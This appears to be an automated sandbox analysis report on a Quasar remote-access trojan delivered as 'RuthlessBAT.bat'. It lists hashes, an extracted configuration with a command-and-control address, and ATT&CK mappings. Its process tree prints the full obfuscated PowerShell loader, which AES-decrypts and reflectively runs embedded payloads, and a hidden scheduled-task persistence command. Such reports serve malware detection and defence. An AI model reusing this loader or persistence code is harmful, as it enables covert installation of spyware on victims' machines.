quasar | 918a07427a6aa97d1f0480a654547fcaf7185228c6bc41d88b19dd740cf4d036

General

Target

RuthlessBAT.bat
Size

1.7MB
MD5

a86b86c2e7182356c6149674ddc26848
SHA1

322292824444ca6a442f881498baac17506eea34
SHA256

918a07427a6aa97d1f0480a654547fcaf7185228c6bc41d88b19dd740cf4d036
SHA512

2111dd5b4b2ab69980ec8b8a851c2ca29aa97a14585535ff2af1b70432f741126578db5f6c50f8cd3623a7f6a27a8fb4ef8275a536b67415abba24dec7f5e3a9
SSDEEP

24576:2b0CZMqoDtzIt2Ipwh+o4w8VV3fgRihOuReKlOX1+ZfHR9QaAHfimfoK6+nZq:2PcY2lMtYXQZg2

Score

10^/10

quasar slave execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.0.0

Botnet

SLAVE

C2

193.34.77.188:6969

Mutex

709ae576-840d-4df5-9c14-3fb7e062cf25

Attributes

encryption_key
8B3D2D2549599D0ED109F63D47FFC788BAA34A06
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Ruthless Client Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/680-64-0x00000133B3590000-0x00000133B38AE000-memory.dmp	family_quasar

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

29 680 powershell.exe
30 680 powershell.exe
32 680 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

680 powershell.exe
2132 powershell.exe
2392 powershell.exe

flow	pid	process
29	680	powershell.exe
30	680	powershell.exe
32	680	powershell.exe

pid	process
680	powershell.exe
2132	powershell.exe
2392	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exetaskmgr.exe

pid	process
2132	powershell.exe
2132	powershell.exe
2392	powershell.exe
2392	powershell.exe
2392	powershell.exe
680	powershell.exe
680	powershell.exe
680	powershell.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2132	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeIncreaseQuotaPrivilege	2392	powershell.exe
Token: SeSecurityPrivilege	2392	powershell.exe
Token: SeTakeOwnershipPrivilege	2392	powershell.exe
Token: SeLoadDriverPrivilege	2392	powershell.exe
Token: SeSystemProfilePrivilege	2392	powershell.exe
Token: SeSystemtimePrivilege	2392	powershell.exe
Token: SeProfSingleProcessPrivilege	2392	powershell.exe
Token: SeIncBasePriorityPrivilege	2392	powershell.exe
Token: SeCreatePagefilePrivilege	2392	powershell.exe
Token: SeBackupPrivilege	2392	powershell.exe
Token: SeRestorePrivilege	2392	powershell.exe
Token: SeShutdownPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeSystemEnvironmentPrivilege	2392	powershell.exe
Token: SeRemoteShutdownPrivilege	2392	powershell.exe
Token: SeUndockPrivilege	2392	powershell.exe
Token: SeManageVolumePrivilege	2392	powershell.exe
Token: 33	2392	powershell.exe
Token: 34	2392	powershell.exe
Token: 35	2392	powershell.exe
Token: 36	2392	powershell.exe
Token: SeIncreaseQuotaPrivilege	2392	powershell.exe
Token: SeSecurityPrivilege	2392	powershell.exe
Token: SeTakeOwnershipPrivilege	2392	powershell.exe
Token: SeLoadDriverPrivilege	2392	powershell.exe
Token: SeSystemProfilePrivilege	2392	powershell.exe
Token: SeSystemtimePrivilege	2392	powershell.exe
Token: SeProfSingleProcessPrivilege	2392	powershell.exe
Token: SeIncBasePriorityPrivilege	2392	powershell.exe
Token: SeCreatePagefilePrivilege	2392	powershell.exe
Token: SeBackupPrivilege	2392	powershell.exe
Token: SeRestorePrivilege	2392	powershell.exe
Token: SeShutdownPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeSystemEnvironmentPrivilege	2392	powershell.exe
Token: SeRemoteShutdownPrivilege	2392	powershell.exe
Token: SeUndockPrivilege	2392	powershell.exe
Token: SeManageVolumePrivilege	2392	powershell.exe
Token: 33	2392	powershell.exe
Token: 34	2392	powershell.exe
Token: 35	2392	powershell.exe
Token: 36	2392	powershell.exe
Token: SeIncreaseQuotaPrivilege	2392	powershell.exe
Token: SeSecurityPrivilege	2392	powershell.exe
Token: SeTakeOwnershipPrivilege	2392	powershell.exe
Token: SeLoadDriverPrivilege	2392	powershell.exe
Token: SeSystemProfilePrivilege	2392	powershell.exe
Token: SeSystemtimePrivilege	2392	powershell.exe
Token: SeProfSingleProcessPrivilege	2392	powershell.exe
Token: SeIncBasePriorityPrivilege	2392	powershell.exe
Token: SeCreatePagefilePrivilege	2392	powershell.exe
Token: SeBackupPrivilege	2392	powershell.exe
Token: SeRestorePrivilege	2392	powershell.exe
Token: SeShutdownPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeSystemEnvironmentPrivilege	2392	powershell.exe
Token: SeRemoteShutdownPrivilege	2392	powershell.exe
Token: SeUndockPrivilege	2392	powershell.exe
Token: SeManageVolumePrivilege	2392	powershell.exe
Token: 33	2392	powershell.exe
Token: 34	2392	powershell.exe
Token: 35	2392	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

taskmgr.exe

pid	process
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exe

pid	process
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe
340	taskmgr.exe

Suspicious use of WriteProcessMemory 14 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exe

description	pid	process	target process
PID 1168 wrote to memory of 3788	1168	cmd.exe	cmd.exe
PID 1168 wrote to memory of 3788	1168	cmd.exe	cmd.exe
PID 1168 wrote to memory of 2132	1168	cmd.exe	powershell.exe
PID 1168 wrote to memory of 2132	1168	cmd.exe	powershell.exe
PID 2132 wrote to memory of 2392	2132	powershell.exe	powershell.exe
PID 2132 wrote to memory of 2392	2132	powershell.exe	powershell.exe
PID 2132 wrote to memory of 1740	2132	powershell.exe	WScript.exe
PID 2132 wrote to memory of 1740	2132	powershell.exe	WScript.exe
PID 1740 wrote to memory of 4468	1740	WScript.exe	cmd.exe
PID 1740 wrote to memory of 4468	1740	WScript.exe	cmd.exe
PID 4468 wrote to memory of 4392	4468	cmd.exe	cmd.exe
PID 4468 wrote to memory of 4392	4468	cmd.exe	cmd.exe
PID 4468 wrote to memory of 680	4468	cmd.exe	powershell.exe
PID 4468 wrote to memory of 680	4468	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\RuthlessBAT.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9m3LhdOOnbkpLgZfroZHKVACZM4EdssbtTG9kf35G7Y='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yeVfqudPUXOzBrMZY66Pgw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZuJwS=New-Object System.IO.MemoryStream(,$param_var); $hPqAb=New-Object System.IO.MemoryStream; $FTAcz=New-Object System.IO.Compression.GZipStream($ZuJwS, [IO.Compression.CompressionMode]::Decompress); $FTAcz.CopyTo($hPqAb); $FTAcz.Dispose(); $ZuJwS.Dispose(); $hPqAb.Dispose(); $hPqAb.ToArray();}function execute_function($param_var,$param2_var){ $zhvpZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $bcvld=$zhvpZ.EntryPoint; $bcvld.Invoke($null, $param2_var);}$SGqmR = 'C:\Users\Admin\AppData\Local\Temp\RuthlessBAT.bat';$host.UI.RawUI.WindowTitle = $SGqmR;$nsoKu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($SGqmR).Split([Environment]::NewLine);foreach ($hvwJs in $nsoKu) { if ($hvwJs.StartsWith('qirvjfQbdGhMEGUUPoFU')) { $bTfWK=$hvwJs.Substring(20); break; }}$payloads_var=[string[]]$bTfWK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
2⤵
PID:3788

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_182_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_182.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2392

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_182.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1740

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_182.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:4468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9m3LhdOOnbkpLgZfroZHKVACZM4EdssbtTG9kf35G7Y='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yeVfqudPUXOzBrMZY66Pgw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZuJwS=New-Object System.IO.MemoryStream(,$param_var); $hPqAb=New-Object System.IO.MemoryStream; $FTAcz=New-Object System.IO.Compression.GZipStream($ZuJwS, [IO.Compression.CompressionMode]::Decompress); $FTAcz.CopyTo($hPqAb); $FTAcz.Dispose(); $ZuJwS.Dispose(); $hPqAb.Dispose(); $hPqAb.ToArray();}function execute_function($param_var,$param2_var){ $zhvpZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $bcvld=$zhvpZ.EntryPoint; $bcvld.Invoke($null, $param2_var);}$SGqmR = 'C:\Users\Admin\AppData\Roaming\Windows_Log_182.bat';$host.UI.RawUI.WindowTitle = $SGqmR;$nsoKu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($SGqmR).Split([Environment]::NewLine);foreach ($hvwJs in $nsoKu) { if ($hvwJs.StartsWith('qirvjfQbdGhMEGUUPoFU')) { $bTfWK=$hvwJs.Substring(20); break; }}$payloads_var=[string[]]$bTfWK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
5⤵
PID:4392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:680

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:340

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
005bc2ef5a9d890fb2297be6a36f01c2

SHA1
0c52adee1316c54b0bfdc510c0963196e7ebb430

SHA256
342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

SHA512
f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3phsoaco.nyv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Windows_Log_182.bat

Filesize
1.7MB

MD5
a86b86c2e7182356c6149674ddc26848

SHA1
322292824444ca6a442f881498baac17506eea34

SHA256
918a07427a6aa97d1f0480a654547fcaf7185228c6bc41d88b19dd740cf4d036

SHA512
2111dd5b4b2ab69980ec8b8a851c2ca29aa97a14585535ff2af1b70432f741126578db5f6c50f8cd3623a7f6a27a8fb4ef8275a536b67415abba24dec7f5e3a9

Download Submit
C:\Users\Admin\AppData\Roaming\Windows_Log_182.vbs

Filesize
115B

MD5
c690b8c1c937d1bea98705c73c7da665

SHA1
e2865bf5603ac182f0c4ace465462c7bbed95fe1

SHA256
fef0767e980eea9fcd65d41cef03bfaffd39780c65fd7970d98c69bc1408a426

SHA512
56dbb94a58effe6491a86a97736a0bdb2644b49c0b6a4b1e8f8fc2ae78d5f47055c4f47efd3af359f25402357a74013a0288a63f8518f7634e83f57f214c3a17

Download Submit
memory/340-58-0x000001ECEF5D0000-0x000001ECEF5D1000-memory.dmp

Filesize
4KB

Download
memory/340-59-0x000001ECEF5D0000-0x000001ECEF5D1000-memory.dmp

Filesize
4KB

Download
memory/340-62-0x000001ECEF5D0000-0x000001ECEF5D1000-memory.dmp

Filesize
4KB

Download
memory/340-50-0x000001ECEF5D0000-0x000001ECEF5D1000-memory.dmp

Filesize
4KB

Download
memory/340-61-0x000001ECEF5D0000-0x000001ECEF5D1000-memory.dmp

Filesize
4KB

Download
memory/340-51-0x000001ECEF5D0000-0x000001ECEF5D1000-memory.dmp

Filesize
4KB

Download
memory/340-52-0x000001ECEF5D0000-0x000001ECEF5D1000-memory.dmp

Filesize
4KB

Download
memory/340-60-0x000001ECEF5D0000-0x000001ECEF5D1000-memory.dmp

Filesize
4KB

Download
memory/340-56-0x000001ECEF5D0000-0x000001ECEF5D1000-memory.dmp

Filesize
4KB

Download
memory/340-57-0x000001ECEF5D0000-0x000001ECEF5D1000-memory.dmp

Filesize
4KB

Download
memory/680-67-0x00000133B46E0000-0x00000133B48A2000-memory.dmp

Filesize
1.8MB

Download
memory/680-64-0x00000133B3590000-0x00000133B38AE000-memory.dmp

Filesize
3.1MB

Download
memory/680-65-0x00000133B3DF0000-0x00000133B3E40000-memory.dmp

Filesize
320KB

Download
memory/680-66-0x00000133B3F00000-0x00000133B3FB2000-memory.dmp

Filesize
712KB

Download
memory/680-70-0x00000133B3E40000-0x00000133B3E52000-memory.dmp

Filesize
72KB

Download
memory/680-71-0x00000133B3EA0000-0x00000133B3EDC000-memory.dmp

Filesize
240KB

Download
memory/2132-13-0x0000027753FB0000-0x0000027753FF4000-memory.dmp

Filesize
272KB

Download
memory/2132-6-0x0000027753BD0000-0x0000027753BF2000-memory.dmp

Filesize
136KB

Download
memory/2132-11-0x00007FFD07FF0000-0x00007FFD08AB1000-memory.dmp

Filesize
10.8MB

Download
memory/2132-0-0x00007FFD07FF3000-0x00007FFD07FF5000-memory.dmp

Filesize
8KB

Download
memory/2132-12-0x00007FFD07FF0000-0x00007FFD08AB1000-memory.dmp

Filesize
10.8MB

Download
memory/2132-14-0x0000027754080000-0x00000277540F6000-memory.dmp

Filesize
472KB

Download
memory/2132-63-0x00007FFD07FF0000-0x00007FFD08AB1000-memory.dmp

Filesize
10.8MB

Download
memory/2132-16-0x0000027754100000-0x0000027754240000-memory.dmp

Filesize
1.2MB

Download
memory/2132-15-0x0000027753D60000-0x0000027753D68000-memory.dmp

Filesize
32KB

Download
memory/2392-32-0x00007FFD07FF0000-0x00007FFD08AB1000-memory.dmp

Filesize
10.8MB

Download
memory/2392-29-0x00007FFD07FF0000-0x00007FFD08AB1000-memory.dmp

Filesize
10.8MB

Download
memory/2392-28-0x00007FFD07FF0000-0x00007FFD08AB1000-memory.dmp

Filesize
10.8MB

Download
memory/2392-18-0x00007FFD07FF0000-0x00007FFD08AB1000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads